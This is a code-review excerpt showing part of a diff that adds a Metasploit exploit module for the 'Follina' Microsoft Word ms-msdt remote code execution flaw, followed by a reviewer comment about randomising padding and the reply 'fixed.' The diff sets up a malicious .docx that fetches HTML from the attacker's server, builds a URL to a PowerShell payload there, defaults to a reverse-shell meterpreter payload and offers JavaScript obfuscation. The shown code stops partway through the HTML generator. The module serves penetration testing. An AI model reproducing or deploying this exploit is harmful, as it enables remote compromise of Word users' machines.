modules/exploits/windows/fileformat/word_msdtjs_rce.rb

```diff
@@ -0,0 +1,219 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft Office Word MSDTJS',
+        'Description' => %q{
+          This vulnerability exploit a Remote Code Execution in Microsoft Word. The document uses the remote template
+          feature to fetch an `HTML` and then uses the `ms-msdt` scheme to execute `PowerShell` code.
+        },
+        'References' => [
+          # No CVE assigned yet!
+          ['URL', 'https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/'],
+          ['URL', 'https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19']
+        ],
+        'Author' => [
+          'nao sec', # Original disclosure.
+          'mekhalleh (RAMELLA Sébastien)' # Zeop CyberSecurity
+        ],
+        'DisclosureDate' => '2022-05-29',
+        'License' => MSF_LICENSE,
+        'Privileged' => false,
+        'Platform' => 'win',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Payload' => {
+          'DisableNops' => true
+        },
+        'DefaultOptions' => {
+          'DisablePayloadHandler' => false,
+          'FILENAME' => 'msf.docx',
+          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+        },
+        'Targets' => [
+          [ 'Microsoft Office Word', {} ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'AKA' => ['Follina'],
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [UNRELIABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']),
+      OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])
+    ])
+  end
+
+  def get_file_in_docx(fname)
+    i = @docx.find_index { |item| item[:fname] == fname }
+
+    unless i
+      fail_with(Failure::NotFound, "This template cannot be used because it is missing: #{fname}")
+    end
+
+    @docx.fetch(i)[:data]
+  end
+
+  def get_template_path
+    datastore['CUSTOMTEMPLATE'] || File.join(Msf::Config.data_directory, 'exploits', 'word_msdtjs.docx')
+  end
+
+  def generate_html
+    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.ps1"
+
+    dummy = ''
+    (1..100).each do |_n|
+      dummy += '//' + 'A' * 100 + "\n"
```

Comment:
Can this be randomized any more than 100 As?

Reply:
fixed.